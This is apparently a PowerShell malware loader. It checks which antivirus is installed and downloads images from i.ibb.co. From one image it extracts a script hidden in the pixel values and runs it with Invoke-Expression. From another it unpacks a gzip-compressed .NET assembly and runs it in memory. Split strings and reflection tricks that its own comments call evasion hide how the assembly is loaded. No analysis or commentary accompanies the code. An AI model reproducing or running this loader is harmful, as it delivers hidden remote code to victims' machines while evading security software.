$avInfo = Get-CimInstance -Namespace "root\SecurityCenter2" -ClassName AntiVirusProduct -ErrorAction SilentlyContinue;
$avFlag = $false;

if($avInfo) {
    foreach($av in $avInfo) {
        $avName = $av.displayName;
        if ($avName -like "*ESET Security*"){ };
        
        if($avName -like "*Malwarebytes*" -or $avName -like "*F-Secure*") {
            Add-Type -AssemblyName System.Drawing;
            $urlPrefix = "https://";
            $imageUrl1 = "i.ibb.co/LXZsz3Jv/oabju2wl.png";
            $fullUrl1 = $urlPrefix + $imageUrl1;
            
            $webClient = New-Object System.Net.WebClient;
            $imgBytes1 = $webClient.DownloadData($fullUrl1);
            $webClient.Dispose();
            
            $memStream1 = New-Object IO.MemoryStream(,$imgBytes1);
            $bitmap1 = [System.Drawing.Bitmap]::FromStream($memStream1);
            
            # Extract payload size from first two pixels
            $pixel0 = $bitmap1.GetPixel(0,0);
            $pixel1 = $bitmap1.GetPixel(1,0);
            $payloadSize1 = ([uint32]$pixel0.R -shl 24) -bor ([uint32]$pixel0.G -shl 16) -bor ([uint32]$pixel0.B -shl 8) -bor [uint32]$pixel1.R;
            
            $payloadArray1 = New-Object byte[] $payloadSize1;
            $byteIndex = 0;
            $x = 2;
            $y = 0;
            
            while($byteIndex -lt $payloadSize1){
                $currentPixel = $bitmap1.GetPixel($x, $y);
                $payloadArray1[$byteIndex++] = $currentPixel.R;
                if ($byteIndex -lt $payloadSize1) { $payloadArray1[$byteIndex++] = $currentPixel.G };
                if ($byteIndex -lt $payloadSize1) { $payloadArray1[$byteIndex++] = $currentPixel.B };
                
                $x++;
                if ($x -ge $bitmap1.Width) { $x = 0; $y++ };
            };
            
            $bitmap1.Dispose();
            $memStream1.Dispose();
            
            $extractedScript = [System.Text.Encoding]::UTF8.GetString($payloadArray1);
            Invoke-Expression $extractedScript;
            $avFlag = $true;
            break;
        };
    };
};

Add-Type -AssemblyName System.Drawing;
$urlPrefix2 = "https://";
$imageUrl2 = "i.ibb.co/Mk72ZRQ6/ervqt4eoyg9.png";
$fullUrl2 = $urlPrefix2 + $imageUrl2;

$webClient2 = New-Object System.Net.WebClient;
$imgBytes2 = $webClient2.DownloadData($fullUrl2);
$webClient2.Dispose();

$memStream2 = New-Object IO.MemoryStream(,$imgBytes2);
$bitmap2 = [System.Drawing.Bitmap]::FromStream($memStream2);

$pixel0_2 = $bitmap2.GetPixel(0,0);
$pixel1_2 = $bitmap2.GetPixel(1,0);
$payloadSize2 = ([uint32]$pixel0_2.R -shl 24) -bor ([uint32]$pixel0_2.G -shl 16) -bor ([uint32]$pixel0_2.B -shl 8) -bor [uint32]$pixel1_2.R;

$byteList = New-Object System.Collections.Generic.List[byte];

for($y2=0; $y2 -lt $bitmap2.Height; $y2++){
    for($x2=0; $x2 -lt $bitmap2.Width; $x2++){
        # Skip the first two pixels (size metadata)
        if(($x2 -eq 0 -and $y2 -eq 0) -or ($x2 -eq 1 -and $y2 -eq 0)){ continue; };
        
        $currentPixel2 = $bitmap2.GetPixel($x2,$y2);
        $byteList.Add($currentPixel2.R);
        $byteList.Add($currentPixel2.G);
        $byteList.Add($currentPixel2.B);
    };
};
$bitmap2.Dispose();
$memStream2.Dispose();

$trimmedBytes = $byteList.ToArray()[0..($payloadSize2-1)];
$compressedStream = New-Object IO.MemoryStream(,$trimmedBytes);
$decompressedStream = New-Object IO.MemoryStream;
$gzipStream = New-Object IO.Compression.GZipStream($compressedStream,[IO.Compression.CompressionMode](0));

$gzipStream.CopyTo($decompressedStream);
$gzipStream.Dispose();
$compressedStream.Dispose();
$finalPayload = $decompressedStream.ToArray();
$decompressedStream.Dispose();

foreach($assembly in [AppDomain]::CurrentDomain.GetAssemblies()){
    if($assembly.GlobalAssemblyCache -and $assembly.Location.Contains('mscor'+'lib.dll')){
        foreach($method in $assembly.GetType(('System.Reflection.Assembly')).GetMethods('Public,Static')){
            # Evasion: Finds the "Load" method by checking the 37th char of its signature string
            if($method.ToString()[37] -eq ']'){
                $loadedAssembly = $method.Invoke($null,(,$finalPayload));
                $entryPoint = $loadedAssembly.EntryPoint;
                $paramCount = $entryPoint.GetParameters().Count;
                
                if($paramCount -eq 0){
                    # Obfuscated Invoke
                    $varName = "entryPoint";
                    $methodName = "Invoke";
                    (Get-Variable $varName).Value.$methodName($null, $null);
                } else {
                    $entryPoint.Invoke($null,(,@()));
                };
                break;
            };
        };
        break;
    };
}
